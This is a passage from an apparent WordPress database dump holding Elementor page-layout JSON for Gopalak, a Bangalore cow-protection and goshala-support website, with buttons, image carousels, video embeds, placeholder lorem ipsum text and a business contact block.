utton\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"},{\"id\":1688,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-karolina-grabowska-4219654-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1692,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-ave-calvar-martinez-3637852-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"_margin\":{\"unit\":\"px\",\"top\":\"-11\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10175,1703,'_elementor_page_assets','a:0:{}'),(10177,1704,'_elementor_edit_mode','builder'),(10178,1704,'_elementor_template_type','wp-page'),(10179,1704,'_elementor_version','3.7.8'),(10180,1704,'_wp_page_template','elementor_canvas'),(10181,1704,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"woocommerce_single\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#006505\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"},{\"id\":1688,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-karolina-grabowska-4219654-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1692,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-ave-calvar-martinez-3637852-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"_margin\":{\"unit\":\"px\",\"top\":\"-11\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click 